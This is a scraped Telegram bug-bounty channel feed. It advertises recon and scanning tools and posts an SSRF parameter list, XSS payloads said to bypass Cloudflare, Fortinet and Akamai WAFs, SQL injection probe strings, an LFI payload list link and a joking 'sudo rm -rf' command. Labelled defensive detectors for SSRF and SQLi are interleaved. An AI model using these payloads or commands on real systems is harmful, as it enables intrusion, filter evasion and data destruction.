BugCod3 – Telegram
BugCod3
6.23K subscribers
308 photos
5 videos
7 files
406 links
ɪɴ ᴛʜᴇ ɴᴀᴍᴇ ᴏꜰ ɢᴏᴅ

[ BugCod3 ] — From Shadows To Shells ⚡️

🕶 Hacking | 🐞 Bug Bounty | 🔐 Security Tools
⚔️ Learn • Hunt • Dominate

🌐 Group: T.me/BugCod3GP
📂 Topic: T.me/BugCod3Topic

🤖 Contact: T.me/BugCod3BOT
📧 Email: BugCod3@protonmail.com
JSNinja - "Hunting Bugs in JavaScript!"

💬
JSNinja is a powerful tool for extracting URLs and sensitive information from JavaScript files. It's designed for security enthusiasts, bug hunters and developers.

📊 Features:
Extract URLs from JavaScript files!
Identify sensitive information such as API keys and tokens!
User-friendly interface!
Open Source and actively maintained!

🔼 Installation:
sudo apt update
sudo apt install git python3 python3-pip -y
cd JSNinja
pip3 install -r requirements.txt


💻 Usage:
python3 jsninja.py -u http://example.com/script.js --secrets --urls

Command-Line Options:
⚪️ -u or --url: Specify a single JavaScript URL to fetch.
⚪️ --secrets: Look for sensitive information in the JavaScript content.
⚪️ --urls: Extract URLs from the JavaScript content.
⚪️ -o or --output_file: Specify the file to save extracted links (default: extracted_links.txt).

😸 Github

⬇️ Download
🔒 BugCod3

#BugBounty #JS #Tips

👤 T.me/BugCod3BOT
📣 T.me/BugCod3
Top 25 server-side request forgery (SSRF) parameters

Here are the top 25 parameters that could be vulnerable to server-side request forgery (SSRF) vulnerability:

?dest={target}
?redirect={target}
?uri={target}
?path={target}
?continue={target}
?url={target}
?window={target}
?next={target}
?data={target}
?reference={target}
?site={target}
?html={target}
?val={target}
?validate={target}
?domain={target}
?callback={target}
?return={target}
?page={target}
?feed={target}
?host={target}
?port={target}
?to={target}
?out={target}
?view={target}
?dir={target}


Next time you encounter such parameters in a URL, take notice, because SSRF is a critical vulnerability that may allow you to:

⚪️ Access services on the loopback interface of the remote server
⚪️ Scan the internal network and potentially interact with internal services
⚪️ Read local files on the server using file:// protocol handler
⚪️ Move laterally / pivoting into the internal environment

#SSRF #BugBounty #Tips

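As an added defender-side example (not code from the BugCod3 post), this Python check flags requests whose query string uses one of the 25 parameter names listed above with a target that points at loopback/private address space or uses a non-HTTP scheme such as file://. The request URLs it is run against are constructed for illustration.

```python
# Added example (not from the BugCod3 post): flag requests whose query string uses
# one of the 25 SSRF-prone parameter names above with a target that points at
# loopback/private/link-local address space or uses a non-HTTP scheme like file://.
import ipaddress
from urllib.parse import urlsplit, parse_qsl

SSRF_PARAMS = {  # the 25 parameter names listed in the post above
    "dest", "redirect", "uri", "path", "continue", "url", "window", "next",
    "data", "reference", "site", "html", "val", "validate", "domain", "callback",
    "return", "page", "feed", "host", "port", "to", "out", "view", "dir",
}
SAFE_SCHEMES = {"http", "https"}

def _split_target(value: str) -> tuple[str, str]:
    """Return (scheme, host) for an absolute URL, or ('', host) for a bare host[:port][/path]."""
    if "://" in value:
        try:
            parts = urlsplit(value)
        except ValueError:  # e.g. unbalanced IPv6 brackets: do not let parsing errors hide it
            return "malformed", ""
        return parts.scheme.lower(), (parts.hostname or "")
    bare = value.split("/", 1)[0]
    if bare.startswith("["):  # bracketed IPv6 literal such as [::1]:8080
        return "", bare[1:bare.find("]")] if "]" in bare else ""
    return "", (bare.rsplit(":", 1)[0] if bare.count(":") == 1 else bare).lower()

def _internal_host(host: str) -> bool:
    """True for localhost names and loopback/private/link-local/unspecified IP literals."""
    if host in {"localhost", "localhost.localdomain"} or host.endswith(".localhost"):
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return False  # DNS name: resolution and rebinding checks are out of scope here
    return ip.is_loopback or ip.is_private or ip.is_link_local or ip.is_unspecified

def suspicious_params(request_url: str) -> list[tuple[str, str, str]]:
    """Return (param, value, reason) for every SSRF-prone parameter carrying a risky target."""
    findings = []
    for name, value in parse_qsl(urlsplit(request_url).query, keep_blank_values=True):
        if name.lower() not in SSRF_PARAMS or not value:
            continue
        scheme, host = _split_target(value)
        if scheme and scheme not in SAFE_SCHEMES:
            findings.append((name, value, f"non-http scheme: {scheme}"))
        elif _internal_host(host):
            findings.append((name, value, f"internal address: {host}"))
    return findings
```

Decimal or octal IP encodings and hostnames that resolve to internal addresses are not caught by this literal check; pair it with resolution-time egress controls.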
CloudFlare XSS Bypass!

OnXSS=<Img/Src/OnError=alert(1)>


It's better than our previous <Img Src=OnXSS OnError=alert(1)> because it works where no spaces are allowed.

#XSS #Bypass

XSS Payload Bypassing Cloudflare WAF on Next.js 14.1.4

Payload: '>alert(154)</script><script/154=';;;;;;;

#XSS #Bypass

Fortinet Fortigate XSS Bypass

Payload: <dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x>

#XSS #Bypass

🦅 Blackbird 🦅

💬
Blackbird is a robust OSINT tool that facilitates rapid searches for user accounts by username or email across a wide array of platforms, enhancing digital investigations. It features WhatsMyName integration, export options in PDF, CSV, and HTTP response formats, and customizable search filters.

🔼 Installation:
cd blackbird
pip install -r requirements.txt


💻 Usage:
Search by username 👤
python blackbird.py --username username1 username2 username3

Search by email 🌐
python blackbird.py --email email1@email.com email2@email.com email3@email.com

Export results to PDF 📂
python blackbird.py --email email1@email.com --pdf

AI:
Blackbird uses AI-powered NER models to improve metadata extraction, identifying key entities for faster and more accurate insights.
python blackbird.py --username username1 --ai

😸 Github

⬇️ Download
🔒 BugCod3

#Python #Osint #Tools

JavaScript: How to extract URLs, srcs and hrefs from all HTML elements in any website? Open DevTools and run
// $$('*') is the DevTools shorthand for document.querySelectorAll('*')
urls = []
$$('*').forEach(element => {
urls.push(element.src)
urls.push(element.href)
urls.push(element.url) // not a standard DOM property, so this is always undefined and gets filtered below
});
// keep only non-empty string values (SVG hrefs are objects, missing attributes are undefined) and de-duplicate
console.log(...new Set(urls.filter(u => typeof u === 'string' && u)))


#js #extract #urls

┌──(BugCod3㉿kali)-[~]
└─$ sudo rm -rf *2024

┌──(BugCod3㉿kali)-[~]
└─$ sudo mkdir 2025


#Notification #NewYear

CVE-2024-55591

A Fortinet FortiOS Authentication Bypass Vulnerable Behaviour Detection

💬
Description:
This script attempts to create a WebSocket connection to a random URI, from a pre-authenticated perspective, on the FortiOS management interface, and reviews the response to determine whether the instance is vulnerable.

Affected Versions:
⚪️ FortiOS 7.0.0 through 7.0.16
⚪️ FortiProxy 7.0.0 through 7.0.19
⚪️ FortiProxy 7.2.0 through 7.2.12

😸 Github

⬇️ Download
🔒 BugCod3

#Python #CVE #Vulnerable #Detection

HExHTTP

💬
HExHTTP is a tool designed to perform tests on HTTP headers and analyze the results to identify vulnerabilities and interesting behaviors.

📊 Features:
⚪️ Server Error response checking
⚪️ Localhost header response analysis
⚪️ Vhosts checking
⚪️ Methods response analysis
⚪️ HTTP Version analysis [Experimental]
⚪️ Cache Poisoning DoS (CPDoS) techniques
⚪️ Web cache poisoning
⚪️ Range poisoning/error (416 response error) [Experimental]
⚪️ Cookie Reflection
⚪️ CDN/proxies Analysis (Envoy/Apache/Akamai/Nginx) [IP]

🔼 Installation:
pip install -r requirements.txt
./hexhttp.py -u 'https://target.tld/'
# OR
python3 hexhttp.py -u 'https://target.tld/'


💻 Usage:
./hexhttp.py -h
# Usage: hexhttp.py [-h] [-u URL] [-f URL_FILE] [-H CUSTOM_HEADER] [-A USER_AGENT] [-F] [-a AUTH] [-b]


😸 Github

⬇️ Download
🔒 BugCod3

#Python #HTTP #Headers #Analyze

IDOR-Forge

IDOR Forge is an advanced and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications.

💬 Description:
IDOR Forge is a powerful and versatile tool designed to detect Insecure Direct Object Reference (IDOR) vulnerabilities in web applications. IDOR vulnerabilities occur when an application exposes direct references to internal objects (e.g., database keys, file paths) without proper authorization checks, allowing attackers to access unauthorized data. This tool automates the process of identifying such vulnerabilities by dynamically generating and testing payloads, analyzing responses, and reporting potential issues.

📊 Features:
⚪️ Dynamic Payload Generation
⚪️ Multi-Parameter Scanning
⚪️ Support for Multiple HTTP Methods
⚪️ Concurrent Scanning
⚪️ Rate Limiting Detection
⚪️ Customizable Test Values
⚪️ Sensitive Data Detection
⚪️ Proxy Support
⚪️ Interactive GUI Mode
⚪️ Verbose Mode
⚪️ Output Options
⚪️ Custom Headers
⚪️ Session Handling

🔼 Installation:
pip install -r requirements.txt
python IDOR-Forge.py


💻 Usage:
# CLI Basic Usage

python IDOR-Forge.py -u "https://example.com/api/resource?id=1"

# Advanced Usage

python IDOR-Forge.py -u "https://example.com/api/resource?id=1" -p -m GET --proxy "http://127.0.0.1:8080" -v -o results.csv --output-format csv

python IDOR-Forge.py -u "http://example.com/resource?id=1" -p -m GET --output results.csv --output-format csv --test-values "[100,200,300]" --sensitive-keywords '["password", "email"]'


🖼 Interactive GUI Mode:
python idor_hunter.py --interactive


😸 Github

⬇️ Download
🔒 BugCod3

#Python #Idor #Vulnerability #Tools

🎯 Directory-Traversal-Payloads 🎯

List of Directory Traversal/LFI Payloads Scraped from the Internet

😸 Github

⬇️ Download
🔒 BugCod3

#Payload #Directory

WordPress A/B Image Optimizer 3.3 Plugin Arbitrary File Download Vulnerability

📊 Category: web applications

💻 Platform: php

🪖 Risk: Security Risk High 🚨

💬
WordPress Plugin A/B Image Optimizer plugin versions 3.3 and below suffers from an arbitrary file download vulnerability.

🔥 CVE: CVE-2025-25163

⬇️ Download
🔒 BugCod3

#CVE #Exploit #PHP #WordPress

Happy Nowruz to all the world 🤙📿
Extracts URLs from OSINT Archives for Security Insights.

💬
Urx is a command-line tool designed for collecting URLs from OSINT archives, such as the Wayback Machine and Common Crawl.

📊 Features:
⚪️ Fetch URLs from multiple sources (Wayback Machine, Common Crawl, OTX)
⚪️ Process multiple domains concurrently
⚪️ Filter results by file extensions or patterns
⚪️ Use presets (predefined filter sets) for convenience (like "no-image" to exclude all image-related extensions)
⚪️ Multiple output formats (plain, JSON, CSV)
⚪️ Output to console or file
⚪️ Support for reading domains from stdin (pipeline integration)
⚪️ URL testing capabilities (status checking, link extraction)

🔼 Installation:
cd urx
cargo build --release


💻 Usage:
# Scan a single domain
urx example.com

# Scan multiple domains
urx example.com example.org

# Scan domains from a file
cat domains.txt | urx


Github

⬇️ Download
🔒 BugCod3

#Osint #URL #Tools

CF-Hero

💬
CF-Hero is a comprehensive reconnaissance tool developed to discover the real IP addresses of web applications protected by Cloudflare. It performs multi-source intelligence gathering through various methods.

📊 Features:

⚪️ DNS Reconnaissance
⚪️ Third-party Intelligence
⚪️ Advanced Features

🔼 Installation:
go install -v github.com/musana/cf-hero/cmd/cf-hero@latest


💻 Usage:
# The most basic running command. It checks A and TXT records by default.
cat domains.txt | cf-hero

# or you can pass the -f parameter to it.
cf-hero -f domains.txt

# Use the censys parameter to include Censys in the scan
cat domain.txt | cf-hero -censys

# Use the shodan parameter to include Shodan in the scan
cat domain.txt | cf-hero -shodan

# Use the securitytrails parameter to include SecurityTrails in the scan
cat domain.txt | cf-hero -securitytrails


Github

⬇️ Download
🔒 BugCod3

#GO #Origin #IP #Tools

Blind SQL Injection

Tips:
1. Gather all URLs from gau/waybackurls and Google Dorking.
2. Inject SQLi payload in all parameters one by one.
3. Analyze the response.

Payload used:
0'XOR(if(now()=sysdate(),sleep(10),0)) XOR'Z

#BugBounty #Payload #SQLi

Useful Wireshark Filters

#WireShark #Tips

SQL injection ID parameter

?id=1' order by 1 --+
?id=1' and "a"="a"--+
?id=1' and database()="security"--+
?id=1' and substring(database(),1,1)="a"--+
?id=1' and sleep(2) and "a"="a"--+
?id=1' and sleep(2) and substring(database(),1,1)="a"--+

#SQL #Injection #Tips

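Added example, not from either post: a small detector that turns the "Blind SQL Injection" payload above and the id-parameter probes in this post into rules and runs them over web-server access logs, rating time-based probes highest. The log lines, client address and path are constructed.

```python
# Added example (not from the BugCod3 posts): detect the blind, boolean and
# time-based SQL injection probes quoted above in web-server access logs.
import re
from urllib.parse import urlsplit, parse_qsl

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|PATCH|DELETE)\s+(\S+)\s+HTTP/')

# Each rule is derived from one of the payloads shown in the two posts above.
SQLI_RULES = [
    ("quote_break",        re.compile(r"""^\d*['"]""")),                 # 1' ... / 0' ...
    ("order_by_probe",     re.compile(r"\border\s+by\s+\d+", re.I)),
    ("boolean_tautology",  re.compile(r"""\band\s+(["'])(\w+)\1\s*=\s*\1\2\1""", re.I)),
    ("db_fingerprint",     re.compile(r"\b(?:database|substring)\s*\(", re.I)),
    ("time_based_sleep",   re.compile(r"\bsleep\s*\(\s*\d+\s*\)", re.I)),
    ("time_based_xor",     re.compile(r"\bxor\s*\(\s*if\s*\(\s*now\s*\(\s*\)\s*=\s*sysdate", re.I)),
    ("comment_terminator", re.compile(r"--[\s+]")),                      # --+ decodes to "-- "
]

def analyze_query(query: str) -> list[dict]:
    """Percent-decode each query parameter and list the rules its value matches."""
    findings = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        rules = [rule for rule, rx in SQLI_RULES if rx.search(value)]
        if rules:
            severity = "high" if any(r.startswith("time_based") for r in rules) else "medium"
            findings.append({"param": name, "value": value, "rules": rules, "severity": severity})
    return findings

def scan_access_log(lines: list[str]) -> list[dict]:
    """Pull the request target from each combined-log line and analyze its query string."""
    results = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m:
            target = urlsplit(m.group(1))
            results += [{"path": target.path, **f} for f in analyze_query(target.query)]
    return results

# Constructed sample lines (not real traffic): one benign request and two probes built
# from the payloads above, percent-encoded the way a browser sends them.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2025:10:00:00 +0000] "GET /product.php?id=1 HTTP/1.1" 200 812',
    '203.0.113.5 - - [01/Jan/2025:10:00:01 +0000] "GET /product.php?id=1%27%20order%20by%201%20--+ HTTP/1.1" 500 0',
    '203.0.113.5 - - [01/Jan/2025:10:00:12 +0000] "GET /product.php?id=0%27XOR(if(now()=sysdate(),sleep(10),0))%20XOR%27Z HTTP/1.1" 200 812',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit["severity"], hit["path"], hit["param"], hit["rules"])
```

A sleep-based probe also shows up as an abnormal response time for an otherwise cheap endpoint, so correlate the "high" hits with latency where the log records it.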
How to use Gobuster to brute-force directories!

$ gobuster dir -u <target-URL> -w <wordlist>

dir: Directory scanning
-u: Target URL
-w: Path to wordlist file

⬇️ Download

#GoBuster #Tips #Tools

📣 T.me/BugCod3
📣 T.me/Exploit_Forge
WAF bypass for Akamai and Cloudflare

Payload:
<address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address>



#WAF #Akamai #Cloudflare
